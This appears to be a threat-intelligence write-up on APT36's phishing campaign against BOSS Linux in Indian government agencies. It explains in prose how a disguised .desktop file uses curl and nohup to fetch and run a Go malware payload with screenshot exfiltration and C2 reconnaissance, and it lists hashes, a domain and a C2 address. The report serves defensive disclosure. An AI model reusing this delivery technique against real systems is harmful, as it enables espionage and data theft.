APT36, also known as Transparent Tribe, is a Pakistan-based advanced persistent threat (APT) group with a history of targeting Indian government and defense sectors. Since 2013, the group has employed various cyber-espionage tactics, including credential harvesting and malware distribution, primarily focusing on Windows-based systems. However, recent intelligence indicates a significant shift in their operational strategy, with APT36 now targeting Linux-based environments, specifically BOSS Linux systems widely used within Indian government agencies.
Phishing Tactics Exploiting Linux Desktop Files
The latest campaign by APT36 employs a multi-stage infiltration process initiated through meticulously crafted phishing emails. These emails contain ZIP file attachments named Cyber-Security-Advisory.zip, which, when extracted, reveal a malicious .desktop file titled Cyber-Security-Advisory.desktop (MD5 hash: 6eb04445cad300c2878e8fbd3cb60b52). This file is designed to execute silently, evading user detection.
The malicious .desktop file utilizes several key parameters:
– Type=Application: Ensures the system recognizes it as an executable application.
– Terminal=false: Prevents the execution of visible terminal windows, maintaining stealth.
– Icon=libreoffice-impress: Disguises the file as a legitimate presentation, enhancing its deceptive appearance.
Embedded Bash commands within the file change the working directory to /tmp and execute dual curl commands. The first command downloads slide.pptx from the attacker-controlled domain sorlastore.com. Despite its .pptx extension, this file contains an HTML iframe displaying a decoy blog page, serving as a distraction. Simultaneously, the second curl command retrieves the primary payload, a malicious ELF binary named BOSS.elf (MD5: 18cf1e3be0e95be666c11d1dbde4588e), saving it locally as client.elf and executing it using nohup for persistent background operation.
Advanced Go-Based Malware Capabilities
The Go-language-based malware exhibits advanced capabilities across multiple attack vectors:
– System Reconnaissance: The malware performs extensive reconnaissance functions, including system hostname identification, CPU and RAM profiling, and runlevel inspection through systemctl commands.
– Activity Logging and Evasion: Utilizing functions like main.junkcalc2, the malware logs activities and employs evasion techniques to avoid detection.
– File System Discovery: Functions such as Main.getDrives and os.readDir enable comprehensive file system discovery and data collection.
– Command and Control (C2) Operations: The malware retrieves server details using main.loadConfig, establishing TCP connections to IP address 101.99.92[.]182:12520. It maintains persistent communication through setKeepAlive and setKeepAlivePeriod functions, automatically attempting reconnection every 30 seconds.
– Data Exfiltration: Employing the github.com/kbinani/screenshot library, the malware captures desktop images. The main.sendResponse function facilitates the exfiltration of various data types, including files, command outputs, and system information.
Alignment with MITRE ATT&CK Framework
The campaign aligns with multiple techniques outlined in the MITRE ATT&CK framework:
– T1566 (Phishing): The use of phishing emails to deliver malicious payloads.
– T1543 (Create or Modify System Process): Establishing persistence through system process manipulation.
– T1059 (Command and Scripting Interpreter): Execution of commands and scripts for malicious purposes.
– T1105 (Ingress Tool Transfer): Transferring tools or payloads into a compromised environment.
– T1071 (Application Layer Protocol): Utilizing application layer protocols for C2 communication.
Implications and Recommendations
The transition of APT36 to targeting Linux-based systems, particularly BOSS Linux, signifies a notable evolution in their cyber-espionage tactics. This shift underscores the increasing risk posed to critical government and defense infrastructure.
Organizations, especially those within the public sector utilizing Linux-based systems, are strongly advised to:
– Enhance Email Security Measures: Implement robust email filtering solutions to detect and block phishing attempts.
– Disable Execution of Untrusted .desktop Files: Configure systems to prevent the execution of untrusted .desktop files to mitigate the risk of malicious payloads.
– Deploy Linux-Specific Detection Tools: Utilize security tools designed to detect and respond to threats targeting Linux environments.
– Conduct Regular Security Training: Educate personnel on recognizing phishing attempts and the importance of not executing unverified files.
– Implement Network Segmentation: Segment networks to limit the spread of malware and restrict unauthorized access.
By adopting these measures, organizations can bolster their defenses against the evolving threats posed by APT36 and similar adversaries.
